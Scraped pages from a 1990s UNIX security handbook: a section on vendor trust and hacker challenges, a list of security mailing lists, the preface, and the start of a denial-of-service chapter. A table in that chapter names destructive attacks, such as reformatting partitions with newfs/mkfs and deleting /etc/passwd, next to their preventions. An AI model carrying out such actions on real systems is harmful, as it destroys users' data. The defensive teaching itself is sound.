The result? Someone with an account on a client machine could easily obtain enough information to<br />

crack the key in a matter of seconds, using only a small program.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch27_02.htm (3 of 6) [2002-04-12 10:45:21]


[Chapter 27] 27.2 Can You Trust Your Suppliers?<br />

27.2.4 Hacker Challenges<br />

Over the past decade, several vendors have issued public challenges stating that their systems are secure<br />

because they haven't been broken by "hacker challenges." Usually, these challenges involve some vendor<br />

putting its system on the <strong>Internet</strong> and inviting all comers to take a whack in return for some token prize.<br />

Then, after a few weeks or months, the vendor shuts down the site, proclaims their product invulnerable,<br />

and advertises the results as if they were a badge of honor. But consider the following:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Few such "challenges" are conducted using established testing techniques. They are ad hoc,<br />

random tests.<br />

That no problems are found does not mean that no problems exist. The testers might not have<br />

exposed them yet. Or, the testers might not have recognized them. (Consider how often software is<br />

released with bugs, even after careful scrutiny.) Furthermore, how do you know that the testers<br />

will report what they find? In some cases, the information may be more valuable to the hackers<br />

later on, after the product has been sold to many customers - because at that time, they'll have<br />

more profitable targets to pursue.<br />

Simply because the vendor does not report a successful penetration does not mean that one did not<br />

occur - the vendor may choose not to report it because it would reflect poorly on the product. Or,<br />

the vendor may not have recognized the penetration.<br />

Challenges give potential miscreants some period to practice breaking the system without penalty.<br />

Challenges also give miscreants an excuse if they are caught trying to break into the system later<br />

(e.g., "We thought the contest was still going on.")<br />

Seldom do the really good experts, on either side of the fence, participate in such exercises. Thus,<br />

anything done is usually done by amateurs. (The "honor" of having won the challenge is not<br />

sufficient to lure the good ones into the challenge. Think about it - good consultants can command<br />

fees of several thousand dollars per day in some cases - why should they effectively donate their<br />

time and names for free advertising?)<br />

Furthermore, the whole process sends the wrong messages - that we should build things and then try to<br />

break them (rather than building them right in the first place), or that there is some prestige or glory in<br />

breaking systems. We don't test the strengths of bridges by driving over them with a variety of cars and<br />

trucks to see if they fail, and pronounce them safe if no collapse occurs during the test.<br />

Some software designers could learn a lot from civil engineers. So might the rest of us: in ancient times,<br />

if a house fell or a bridge collapsed and injured someone, the engineer who designed it was crushed to<br />

death in the rubble as punishment!<br />

Next time you see an advertiser using a challenge to sell a product, you should ask if the challenger is<br />

really giving you more confidence in the product...or convincing you that the vendor doesn't have a clue<br />

as to how to really design and test security.<br />

If you think that a security challenge builds the right kind of trust, then get in touch with us. We have<br />

these magic pendants. No one wearing one has ever had a system broken into, despite challenges to all<br />

the computer users who happened to be around when the systems were developed. Thus, the pendants<br />

must be effective at keeping out hackers. We'll be happy to sell some to you. After all, we employ the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch27_02.htm (4 of 6) [2002-04-12 10:45:21]


[Chapter 27] 27.2 Can You Trust Your Suppliers?<br />

same rigorous testing methodology as your security software vendors, so our product must be reliable,<br />

right?<br />

27.2.5 <strong>Sec</strong>urity Bugs that Never Get Fixed<br />

There is also the question of legitimate software distributed by computer manufacturers that contains<br />

glaring security holes. More than a year after the release of sendmail Version 8, nearly every major<br />

<strong>UNIX</strong> vendor was still distributing its computers equipped with sendmail Version 5. (Versions 6 and 7<br />

were interim releases which were never released.) While Version 8 had many improvements over<br />

Version 5, it also had many critical security patches. Was the unwillingness of <strong>UNIX</strong> vendors to adopt<br />

Version 8 negligence - a demonstration of their laissez-faire attitude towards computer security - or<br />

merely a reflection of pressing market conditions?[4] Are the two really different?<br />

[4] Or was the new, "improved" program simply too hard to configure? At least one vendor<br />

told us that it was.<br />

How about the case in which many vendors still release versions of TFTP that, by default, allow remote<br />

users to obtain copies of the password file? What about versions of RPC that allow users to spoof NFS<br />

by using proxy calls through the RPC system? What about software that includes a writable utmp file that<br />

enables a user to overwrite arbitrary system files? Each of these cases is a well-known security flaw. In<br />

each case, the vendors did not provide fixes for years - even now, they may not be fixed.<br />

Many vendors say that computer security is not a high priority, because they are not convinced that<br />

spending more money on computer security will pay off for them. Computer companies are rightly<br />

concerned with the amount of money that they spend on computer security. Developing a more secure<br />

computer is an expensive proposition that not every customer may be willing to pay for. The same level<br />

of computer security may not be necessary for a server on the <strong>Internet</strong> as for a server behind a corporate<br />

firewall, or on a disconnected network. Furthermore, increased computer security will not automatically<br />

increase sales: firms that want security generally hire staff who are responsible for keeping systems<br />

secure; users who do not want (or do not understand) security are usually unwilling to pay for it at any<br />

price, and frequently disable security when it is provided.<br />

On the other hand, a computer company is far better equipped to safeguard the security of its operating<br />

system than is an individual user. One reason is that a computer company has access to the system's<br />

source code. A second reason is that most large companies can easily devote two or three people to<br />

assuring the security of their operating system, whereas most businesses are hard-pressed to devote even<br />

a single full-time employee to the job of computer security.<br />

We believe that computer users are beginning to see system security and software quality as<br />

distinguishing features, much in the way that they see usability, performance, and new functionality as<br />

features. When a person breaks into a computer, over the <strong>Internet</strong> or otherwise, the act reflects poorly on<br />

the maker of the software. We hope that computer companies will soon make software quality at least as<br />

important as new features.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch27_02.htm (5 of 6) [2002-04-12 10:45:21]


[Chapter 27] 27.2 Can You Trust Your Suppliers?<br />

27.2.6 Network Providers that Network Too Well<br />

Network providers pose special challenges for businesses and individuals. By their nature, network<br />

providers have computers that connect directly to your computer network, placing the provider (or<br />

perhaps a rogue employee at the providing company) in an ideal position to launch an attack against your<br />

installation. For consumers, providers are usually in possession of confidential billing information<br />

belonging to the users. Some providers even have the ability to directly make charges to a user's credit<br />

card or to deduct funds from a user's bank account.<br />

Dan Geer, a Cambridge-based computer security professional, tells an interesting story about an<br />

investment brokerage firm that set up a series of direct IP connections between its clients' computers and<br />

the computers at the brokerage firm. The purpose of the links was to allow the clients to trade directly on<br />

the brokerage firm's computer system. But as the client firms were also competitors, the brokerage house<br />

equipped the link with a variety of sophisticated firewall systems.<br />

It turns out, says Geer, that although the firm had protected itself from its clients, it did not invest the<br />

time or money to protect the clients from each other. One of the firm's clients proceeded to use the direct<br />

connection to break into the system operated by another client. A significant amount of proprietary<br />

information was stolen before the intrusion was discovered.<br />

In another case, a series of articles appearing in The New York Times during the first few months of 1995<br />

revealed how hacker Kevin Mitnick allegedly broke into a computer system operated by Netcom<br />

Communications. One of the things that Mitnick is alleged to have stolen was a complete copy of<br />

Netcom's client database, including the credit card numbers for more than 30,000 of Netcom's customers.<br />

Certainly, Netcom needed the credit card numbers to bill its customers for service. But why were they<br />

placed on a computer system that could be reached from the <strong>Internet</strong>? Why were they not encrypted?<br />

Think about all those services that are sprouting up on the World Wide Web. They claim to use all kinds<br />

of super encryption protocols to safeguard your credit card number as it is sent across the network. But<br />

remember - you can reach their machines via the <strong>Internet</strong> to make the transaction. What kinds of<br />

safeguards do they have in place at their sites to protect all the card numbers after they're collected? If<br />

you saw an armored car transferring your bank's receipts to a "vault" housed in a cardboard box on a park<br />

bench, would the strength of the armored car cause you to trust the safety of the funds?<br />

27.1 Can you Trust Your<br />

Computer?<br />

27.3 Can You Trust People?<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch27_02.htm (6 of 6) [2002-04-12 10:45:21]


[Appendix E] Electronic Resources<br />

Appendix E<br />

E. Electronic Resources<br />

Contents:<br />

Mailing Lists<br />

Usenet Groups<br />

WWW Pages<br />

Software Resources<br />

There is a certain irony in trying to include a comprehensive list of electronic resources in a printed book<br />

such as this one. Electronic resources such as Web pages, newsgroups, and mailing lists are updated on<br />

an hourly basis; new releases of computer programs can be published every few weeks.<br />

Books, on the other hand, are infrequently updated. The first edition of <strong>Practical</strong> <strong>UNIX</strong> <strong>Sec</strong>urity, for<br />

instance, was written between 1989 and 1990, and published in 1991. This revised edition was started in<br />

1995 and not published until 1996. Interim reprintings incorporated corrections, but did not include new<br />

material.<br />

Some of the programs listed in this appendix appear to be "dead," or, in the vernacular jargon of<br />

academia, "completed." For instance, consider the case of COPS, developed as a student project by Dan<br />

Farmer at Purdue University under the direction of Gene Spafford. The COPS program is still referenced<br />

by many first-rate texts on computer security. But as of early 1996, COPS hasn't been updated in more<br />

than four years and fails to install cleanly on many major versions of <strong>UNIX</strong>; Dan Farmer has long since<br />

left Gene's tutelage and gone on to fame, fortune, and other projects (such as the SATAN tool). COPS<br />

rests moribund on the COAST FTP server, apparently a dead project. Nevertheless, before this book is<br />

revised for a third time, there exists the chance that someone else will take up COPS and put a new face<br />

on it. And, we note that there is still some value in applying COPS - some of the flaws that it finds are<br />

still present in systems shipped by some vendors (assuming that you can get the program to compile).<br />

We thus present the following electronic resources with the understanding that this list necessarily cannot<br />

be complete nor completely up to date. What we hope, instead, is that it is expansive. By reading it, we<br />

hope that you will gain insight into places to look for future developments in computer security. Along<br />

the way, you may find some information you can put to immediate use.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appe_01.htm (1 of 5) [2002-04-12 10:45:22]


[Appendix E] Electronic Resources<br />

E.1 Mailing Lists<br />

There are many mailing lists that cover security-related material. We describe a few of the major ones<br />

here. However, this is not to imply that only these lists are worthy of mention! There may well be other<br />

lists of which we are unaware, and many of the lesser-known lists often have a higher volume of good<br />

information.<br />

NOTE: Never place blind faith in anything you read in a mailing list, especially if the list is<br />

unmoderated. There are a number of self-styled experts on the net who will not hesitate to<br />

volunteer their views, whether knowledgeable or not. Usually their advice is benign, but<br />

sometimes it is quite dangerous. There may also be people who are providing bad advice on<br />

purpose, as a form of vandalism. And certainly there are times where the real experts make a<br />

mistake or two in what they recommend in an offhand note posted to the net.<br />

There are some real experts on these lists who are (happily) willing to share their knowledge<br />

with the community, and their contributions make the <strong>Internet</strong> a better place. However, keep<br />

in mind that simply because you read it on the network does not mean that the information is<br />

correct for your system or environment, does not mean that it has been carefully thought out,<br />

does not mean that it matches your site policy, and most certainly does not mean that it will<br />

help your security. Always evaluate carefully the information you receive before acting on it.<br />

E.1.1 Response Teams and Vendors<br />

Many of the incident response teams (listed in Appendix F) have mailing lists for their advisories and<br />

alerts. If you can be classified as one of their constituents, you should contact the appropriate team(s) to<br />

be placed on their mailing lists.<br />

Many vendors also have mailing lists for updates and advisories concerning their products. These include<br />

computer vendors, firewall vendors, and vendors of security software (including some freeware and<br />

shareware products). You may wish to contact your vendors to see if they have such lists, and if so, join.<br />

E.1.2 A Big Problem With Mailing Lists<br />

The problem with all these lists is that you can easily overwhelm yourself. If you are on lists from two<br />

response teams, four vendors, and another half-dozen general-purpose lists, you may find yourself<br />

filtering several hundred messages a day whenever a new general vulnerability is discovered. At the<br />

same time, you don't want to unsubscribe from these lists, because you might then miss the timely<br />

announcement of a special-case fix for your own systems.<br />

One method that we have seen others use with some success is to split the mailing lists up among a group<br />

of administrators. Each person gets one or two lists to monitor, with particularly useful messages then<br />

redistributed to the entire group. Be certain to arrange coverage of these lists if someone leaves or goes<br />

on vacation, however!<br />

Another approach is to feed these messages into Usenet newsgroups you create locally especially for this<br />

purpose. This strategy allows you to read the messages using an advanced newsreader that will allow you<br />

to kill message chains or trigger on keywords. It may also help provide an archiving mechanism to allow<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appe_01.htm (2 of 5) [2002-04-12 10:45:22]


[Appendix E] Electronic Resources<br />

you to keep several days or weeks (or more) of the messages.<br />

E.1.3 Major Mailing Lists<br />

These are some of the major mailing lists.<br />

E.1.3.1 Academic-Firewalls<br />

The Academic-Firewalls mailing list is for people interested in discussing firewalls in the academic<br />

environment. This mailing list is hosted at Texas A&M University. To subscribe, send "subscribe<br />

academic-firewalls" in the body of a message to majordomo@net.tamu.edu.<br />

Academic-Firewalls is archived at:<br />

ftp://net.tamu.edu/pub/security/lists/academic-firewalls/<br />

E.1.3.2 Best of security<br />

This is a non-discussion mailing list for remailing items from other security-oriented mailing lists. It is<br />

intended for subscribers to forward the "best" of other mailing lists - avoiding the usual debate,<br />

argument, and disinformation present on many lists.<br />

To subscribe to this particular mailing list, send "subscribe best-of-security" in the body of a message to<br />

best-of-security-request@suburbia.net.<br />

E.1.3.3 Bugtraq<br />

Bugtraq is a full-disclosure computer security mailing list. This list features detailed discussion of <strong>UNIX</strong><br />

security holes: what they are, how to exploit them, and what to do to fix them. This list is not intended to<br />

be about cracking systems or exploiting their vulnerabilities (although that is known to be the intent of<br />

some of the subscribers). It is, instead, about defining, recognizing, and preventing use of security holes<br />

and risks. To subscribe, send "subscribe bugtraq" in the body of a message to bugtraq-request@fc.net.<br />

Note that we have seen some incredibly incorrect and downright bad advice posted to this list.<br />

Individuals who attempt to point out errors or corrections are often roundly flamed as being<br />

"anti-disclosure." Post to this list with caution if you are the timid sort.<br />

E.1.3.4 CERT-advisory<br />

New CERT-CC advisories of security flaws and fixes for <strong>Internet</strong> systems are posted to this list. This list<br />

makes somewhat boring reading; often the advisories are so watered down that you cannot easily figure<br />

out what is actually being described. Nevertheless, the list does have its bright spots. Send subscription<br />

requests to cert-advisory-request@cert.org.<br />

Archived past advisories are available from info.cert.org via anonymous FTP from:<br />

ftp://info.cert.org/<br />

ftp://coast.cs.purdue.edu/pub/alert/CERT<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appe_01.htm (3 of 5) [2002-04-12 10:45:22]


[Appendix E] Electronic Resources<br />

E.1.3.5 CIAC-notes<br />

The staff at the Department of Energy CIAC publish helpful technical notes on an infrequent basis.<br />

These are very often tutorial in nature. To subscribe to the list, send a message with "subscribe ciac-notes<br />

yourname" in the message body to ciac-listproc@llnl.gov. Or, you may simply wish to browse the<br />

archive of old notes:<br />

ftp://ciac.llnl.gov/pub/ciac/notes<br />

ftp://coast.cs.purdue.edu/pub/alert/CIAC/notes<br />

E.1.3.6 Computer underground digest<br />

A curious mixture of postings on privacy, security, law, and the computer underground fill this list.<br />

Despite the name, this list is not a digest of material by the "underground" - it contains information about<br />

the computing milieux. To subscribe, send a mail message with the subject line "subscribe cu-digest" to<br />

cu-digest@weber.ucsd.edu.<br />

This list is also available as the newsgroup comp.society.cu-digest on the Usenet; the newsgroup is the<br />

preferred means of distribution. The list is archived at numerous places around the <strong>Internet</strong>, including:<br />

ftp://ftp.eff.org/pub/Publications/CuD<br />

E.1.3.7 Firewalls<br />

The Firewalls mailing list, which is hosted by Great Circle Associates, is the primary forum for folks on<br />

the <strong>Internet</strong> who want to discuss the design, construction, operation, maintenance, and philosophy of<br />

<strong>Internet</strong> firewall security systems. To subscribe, send a message to majordomo@greatcircle.com with<br />

"subscribe firewalls" in the body of the message.<br />

The Firewalls mailing list is usually high volume (sometimes more than 100 messages per day, although<br />

usually it is only several dozen per day). To accommodate subscribers who don"t want their mailboxes<br />

flooded with lots of separate messages from Firewalls, there is also a Firewalls-Digest mailing list<br />

available. Subscribers to Firewalls-Digest receive daily (more frequent on busy days) digests of messages<br />

sent to Firewalls, rather than each message individually. Firewalls-Digest subscribers get all the same<br />

messages as Firewalls subscribers; that is, Firewalls-Digest is not moderated, just distributed in digest<br />

form.<br />

The mailing list is archived:<br />

ftp://ftp.greatcircle.com/pub/firewalls/<br />

http://www.greatcircle.com/firewalls<br />

E.1.3.8 FWALL-user<br />

The FWALL-users mailing list is for discussions of problems, solutions, etc. among users of the TIS<br />

<strong>Internet</strong> Firewall Toolkit (FWTK). To subscribe, send email to fwall-users-request@tis.com.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appe_01.htm (4 of 5) [2002-04-12 10:45:22]


[Appendix E] Electronic Resources<br />

E.1.3.9 RISKS<br />

RISKS is officially known as the ACM Forum on Risks to the Public in the Use of Computers and<br />

Related Systems. It's a moderated forum for discussion of risks to society from computers and<br />

computerization. Send email subscription requests to RISKS-Request@csl.sri.com.<br />

Back issues are available from unix.sri.com via anonymous FTP:<br />

ftp://unix.sri.com/risks/<br />

RISKS is also distributed as the comp.risks Usenet newsgroup, and this is the preferred method of<br />

subscription.<br />

E.1.3.10 WWW-security<br />

The WWW-security mailing list discusses the security aspects of WWW servers and clients. To<br />

subscribe, send "subscribe www-security" in the body of a message to majordomo@nsmx.rutgers.edu.<br />

D.2 <strong>Sec</strong>urity Periodicals E.2 Usenet Groups<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appe_01.htm (5 of 5) [2002-04-12 10:45:22]


Preface<br />

Preface<br />

Contents:<br />

<strong>UNIX</strong> "<strong>Sec</strong>urity"?<br />

Scope of This Book<br />

Which <strong>UNIX</strong> System?<br />

Conventions Used in This Book<br />

Online Information<br />

Acknowledgments<br />

Comments and Questions<br />

A Note to Computer Crackers<br />

Preface<br />

It's been five years since the publication of the first edition of <strong>Practical</strong> <strong>UNIX</strong> <strong>Sec</strong>urity, and oh, what a<br />

difference a little bit of time makes!<br />

In 1991, the only thing that most Americans knew about <strong>UNIX</strong> and the <strong>Internet</strong> was that it was the venue<br />

that had been besieged by a "computer virus" in 1988. Today, more than 10 million Americans use the<br />

<strong>Internet</strong> on a regular basis to send electronic mail, cruise the World Wide Web, and even shop. In 1991,<br />

we called the <strong>Internet</strong> a "global village." Today, it is an Information Highway that's getting larger and<br />

more crowded by the minute, with millions of users from hundreds of countries on all seven continents<br />

electronically connected to each other.<br />

And yet, despite our greater reliance on network computing, the <strong>Internet</strong> isn't a safer place today than it<br />

was in 1991. If anything, the <strong>Internet</strong> is quickly becoming the Wild West of cyberspace. Although<br />

academics and industry leaders have long known about fundamental vulnerabilities of computers<br />

connected to the <strong>Internet</strong>, these flaws have been accommodated rather than corrected. As a result, we<br />

have seen many cases within the past few years of wide-scale security infractions throughout the<br />

network; in one single case, more than 30,000 people had their passwords stolen and accounts<br />

compromised; in another, more than 20,000 credit card numbers were allegedly stolen from one company<br />

in a single unauthorized access.<br />

Computer crime is a growing problem. One recent study by the Yankee Group, a research analysis firm,<br />

estimated that losses of productivity, customer confidence, and competitive advantage as a result of<br />

computer security breaches could cost U.S. businesses alone more than $5 billion annually.[1] Other<br />

studies, cited in a 1995 Computer <strong>Sec</strong>urity Institute publication, Current and Future Danger,[2] indicated:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_01.htm (1 of 5) [2002-04-12 10:45:22]


Preface<br />

●<br />

●<br />

●<br />

[1] "<strong>Sec</strong>uring the LAN Environment," The Yankee Group, January 1994 White Paper<br />

(+1-617-367-1000).<br />

[2] Power, Richard. Current and Future Danger: A CSI Primer on Computer Crime and<br />

Information Warfare. Computer <strong>Sec</strong>urity Institute, 1995.<br />

Combined losses from computer and telecommunications fraud in the U.S. alone may be over $10<br />

billion a year, and growing.<br />

Almost 25% of all organizations have experienced a verifiable computer crime in the 12 months<br />

preceding the survey.<br />

Theft of proprietary business information, as reported monthly, rose 260% during the five-year<br />

period from 1988 to 1993.<br />

Another 1995 study, Computer Crime in America,[3] reported that:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

[3] Carter, David and Andra Katz. Computer Crime in America. Michigan State University,<br />

1995.<br />

98.5% of all businesses surveyed had been victims of some form of computer crime.<br />

43.3% of the businesses reported having been the victims of computer crimes more than 25 times.<br />

Unauthorized access to computer files for "snooping" (as opposed to outright theft) has increased<br />

by over 95% in the past five years.<br />

Software piracy-improper copying of software in violation of copyrights- has increased by over<br />

91% in the past five years.<br />

Intentional introduction of viruses into corporate networks is up over 66% in the past five years.<br />

Unauthorized access to business information and theft of proprietary information are up over 75%<br />

in the last five years.<br />

And remember, the majority of computer security incidents are never discovered or reported!<br />

In late 1995, the magazine Information Week and the accounting firm Ernst & Young conducted a<br />

survey of major companies in America and found that more than 20 had lost more than $1 million worth<br />

of information as a result of a security lapse in the previous two years. The survey also found that more<br />

than 80% had a full-time information security director, and nearly 70% thought that the computer<br />

security threat to companies had increased within the past five years.<br />

What do all of these numbers mean for <strong>UNIX</strong>? Because of the widespread use of <strong>UNIX</strong> as the operating<br />

system of choice on the <strong>Internet</strong>, and its prevalence in client/server environments, it is undoubtedly the<br />

case that many <strong>UNIX</strong> machines were involved in these incidents. Because of its continuing use in these<br />

environments, <strong>UNIX</strong> may be involved in the majority of incidents yet to come-the statistics and trends<br />

are disturbing. We hope that this new edition of our book helps limit the scope and number of these new<br />

incidents.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_01.htm (2 of 5) [2002-04-12 10:45:22]


Preface<br />

<strong>UNIX</strong> "<strong>Sec</strong>urity"?<br />

When the first version of this book appeared in 1991, many people thought that the words "<strong>UNIX</strong><br />

security" were an oxymoron-two words that appeared to contradict each other, much like the words<br />

"jumbo shrimp" or "Congressional action." After all, the ease with which a <strong>UNIX</strong> guru could break into a<br />

system, seize control, and wreak havoc was legendary in the computer community. Some people couldn't<br />

even imagine that a computer running <strong>UNIX</strong> could be made secure.<br />

Since then, the whole world of computers has changed. These days, many people regard <strong>UNIX</strong> as a<br />

relatively secure operating system...at least, they use <strong>UNIX</strong> as if it were. Today, <strong>UNIX</strong> is used by<br />

millions of people and many thousands of organizations around the world, all without obvious major<br />

mishap. And while <strong>UNIX</strong> was not designed with military-level security in mind, it was built both to<br />

withstand limited external attacks and to protect users from the accidental or malicious actions of other<br />

users on the system. Years of constant use and study have made the operating system even more secure,<br />

because most of the <strong>UNIX</strong> security faults are publicized and fixed.<br />

But the truth is, <strong>UNIX</strong> really hasn't become significantly more secure with its increase in popularity.<br />

That's because fundamental flaws still remain in the interaction of the operating system's design and its<br />

uses. The <strong>UNIX</strong> superuser remains a single point of attack: any intruder or insider who can become the<br />

<strong>UNIX</strong> superuser can take over the system, booby-trap its programs, and hold the computer's users<br />

hostage-sometimes even without their knowledge.<br />

One thing that has improved is our understanding of how to keep a computer relatively secure. In recent<br />

years, a wide variety of tools and techniques have been developed with the single goal of helping system<br />

administrators secure their <strong>UNIX</strong> computers. Another thing that's changed is the level of understanding<br />

of <strong>UNIX</strong> by system administrators: now it is relatively easy for companies and other organizations to hire<br />

a professional system manager who will be concerned about computer security and make it a top priority.<br />

This book can help.<br />

What This Book Is<br />

This book is a practical guide to <strong>UNIX</strong> security. For users, we explain what computer security is,<br />

describe some of the dangers that you may face, and tell you how to keep your data safe and sound. For<br />

administrators, we explain in greater detail how <strong>UNIX</strong> security mechanisms work and tell how to<br />

configure and administer your computer for maximum protection. For everybody, we try to teach<br />

something about <strong>UNIX</strong>'s internals, its history, and how to keep yourself from getting burned.<br />

Is this book for you? Probably. If you administer a <strong>UNIX</strong> system, you will find many tips for running<br />

your computer more securely. Even if you're a casual user of a <strong>UNIX</strong> system, you should read this book.<br />

If you are a complete novice at <strong>UNIX</strong>, you will benefit from reading this book, because it contains a<br />

thorough overview of the <strong>UNIX</strong> operating system in general. You don't want to stay a <strong>UNIX</strong> novice<br />

forever! (But you might want to read some other <strong>O'Reilly</strong> books first; consult Appendix D, Paper<br />

Sources, for some suggestions.)<br />

What we've done here has been to collect helpful information concerning how to secure your <strong>UNIX</strong><br />

system against threats, both internal and external. Most of the material is intended for a <strong>UNIX</strong> system<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_01.htm (3 of 5) [2002-04-12 10:45:22]


Preface<br />

administrator or manager. In most cases, we've presented material and commands without explaining in<br />

any detail how they work, and in several cases we've simply pointed out the nature of the commands and<br />

files that need to be examined; we've assumed that a typical system administrator is familiar with the<br />

commands and files of his or her system, or at least has the manuals available to study.<br />

A Note About Your Manuals<br />

Some people may think that it is a cop-out for a book on computer security to advise the reader to read<br />

his or her system manuals. But it's not. The fact is, computer vendors change their software much faster<br />

(and with less notice) than publishers bring out new editions of books. If you are concerned about<br />

running your computer securely, then you should spend the extra time to read your manuals to verify<br />

what we say. You should also experiment with your running system, to make sure that the programs<br />

behave the way they are documented.<br />

Thus, we recommend that you go back and read through the manuals every few months to stay familiar<br />

with your system. Sometimes rereading the manuals after gaining new experience gives you added<br />

insight. Other times it reminds you of useful features that you aren't yet using. Many successful system<br />

administrators have told us that they make it a point to reread all their manuals every 6 to 12 months!<br />

Certain key parts of this book were written in greater detail than the rest, with a novice user in mind. We<br />

have done this for two reasons: to be sure that important <strong>UNIX</strong> security concepts are presented to the<br />

fullest and to make important sections (such as the ones on file permissions and passwords) readable on<br />

their own. That way, this book can be passed around with a note saying, "Read Chapter 3, Users and<br />

Passwords to learn about how to set passwords."[4]<br />

[4] Remember to pass around the book itself or get another copy to share. If you were to<br />

make a photocopy of the pages to circulate, it would be a significant violation of the<br />

copyright. This sets a bad example about respect for laws and rules, and conveys a message<br />

contrary to good security policy!<br />

What This Book Is Not<br />

This book is not intended to be a <strong>UNIX</strong> tutorial. Neither is this book a system administration<br />

tutorial-there are better books for that,[5] and good system administrators need to know about much more<br />

than security. Use this book as an adjunct to tutorials and administration guides.<br />

[5] A few of which we have listed in Appendix D.<br />

This book is also not a general text on computer security-we've tried to keep the formalisms to a<br />

minimum. Thus, this is not a book that is likely to help you design new security mechanisms for <strong>UNIX</strong>,<br />

although we have included a chapter on how to write more secure programs.<br />

We've also tried to minimize the amount of information in this book that would be useful to people trying<br />

to break into computer systems. If that is your goal, then this book probably isn't for you.<br />

We have also tried to resist the temptation to suggest:<br />

●<br />

Replacements for your standard commands<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_01.htm (4 of 5) [2002-04-12 10:45:22]


Preface<br />

●<br />

●<br />

Modifications to your kernel<br />

Other significant programming exercises to protect your system<br />

The reason has to do with our definition of practical. For security measures to be effective, they need to<br />

be generally applicable. Most users of commercial systems do not have access to the source code, and<br />

many don't even have access to compilers for their systems. Public domain sources for some replacement<br />

commands are unlikely to have support for the special features different vendors add to their systems. If<br />

we were to suggest changes, they might not be applicable to every platform of interest.<br />

There is also a problem associated with managing wide-scale changes. Not only may changes make the<br />

system more difficult to maintain, but changes may be impossible to manage across dozens of<br />

architectures in different locations and configurations. They also will make vendor maintenance more<br />

difficult-how can vendors respond to bug reports for software that they didn't provide?<br />

Last of all, we have seen many programs and suggested fixes posted on the <strong>Internet</strong> that are incorrect or<br />

even dangerous. Many administrators of commercial and academic systems do not have the necessary<br />

expertise to evaluate the overall security impact of changes to their system's kernel, architecture, or<br />

commands. If you routinely download and install third-party patches and programs to improve your<br />

system's security, your overall security may well be worse in the long term.<br />

For all of these reasons, our emphasis is on using tools provided with your operating systems. Where<br />

there are exceptions to this rule, we will explain our reasoning.<br />

Scope of This Book<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_01.htm (5 of 5) [2002-04-12 10:45:22]


[Chapter 25] Denial of Service Attacks and Solutions<br />

Chapter 25<br />

25. Denial of Service Attacks and<br />

Solutions<br />

Contents:<br />

Destructive Attacks<br />

Overload Attacks<br />

Network Denial of Service Attacks<br />

In cases where denial of service attacks did occur, it was either by accident or relatively easy to figure<br />

out who was responsible. The individual could be disciplined outside the operating system by other<br />

means.<br />

- Dennis Ritchie<br />

A denial of service attack is an attack in which one user takes up so much of a shared resource that none<br />

of the resource is left for other users. Denial of service attacks compromise the availability of the<br />

resources. Those resources can be processes, disk space, percentage of CPU, printer paper, modems, or<br />

the time of a harried system administrator. The result is degradation or loss of service.<br />

<strong>UNIX</strong> provides few types of protection against accidental or intentional denial of service attacks. Most<br />

versions of <strong>UNIX</strong> allow you to limit the maximum number of files or processes that a user is allowed.<br />

Some versions also let you place limits on the amount of disk space consumed by any single UID<br />

(account). But compared with other operating systems, <strong>UNIX</strong> is downright primitive in its mechanisms<br />

for preventing denial of service attacks.<br />

This is a short chapter because, as Ritchie noted, it is usually easy to determine who is responsible for a<br />

denial of service attack and to take appropriate actions.<br />

There are two types of denial of service attacks. The first type of attack attempts to damage or destroy<br />

resources so you can't use them. Examples range from causing a disk crash that halts your system to<br />

deleting critical commands like cc and ls.<br />

The second type of attack overloads some system service or exhausts some resource (either deliberately<br />

by an attacker, or accidentally as the result of a user's mistake), thus preventing others from using that<br />

service. This simplest type of overload involves filling up a disk partition so users and system programs<br />

can't create new files. The "bacteria" discussed in Chapter 11, Protecting Against Programmed Threats,<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch25_01.htm (1 of 2) [2002-04-12 10:45:23]


[Chapter 25] Denial of Service Attacks and Solutions<br />

perform this kind of attack.<br />

Many denial of service problems in this second category result from user error or runaway programs<br />

rather than explicit attacks. For example, one common cause is typographical errors in programs, or<br />

reversed conditions, such as using the statement x==0 when you really meant to type x!=0.<br />

25.1 Destructive Attacks<br />

There are a number of ways to destroy or damage information in a fashion that denies service. Almost all<br />

of the attacks we know about can be prevented by restricting access to critical accounts and files, and<br />

protecting them from unauthorized users. If you follow good security practice to protect the integrity of<br />

your system, you will also prevent destructive denial of service attacks. Table 25.1 lists some potential<br />

attacks and how to prevent them.<br />

Table 25.1: Potential Attacks and Their Prevention<br />

Attack Prevention<br />

Reformatting a disk partition or running the Prevent anyone from accessing the machine in<br />

newfs/mkfs command.<br />

single-user mode. Protect the superuser account.<br />

Physically write-protect disks that are used read-only.<br />

Deleting critical files (e.g., needed files that are Protect system files and accounts by specifying<br />

in /dev or the /etc/passwd file)<br />

appropriate modes (e.g., 755 or 711). Protect the<br />

superuser account. Set ownership of NFS-mounted<br />

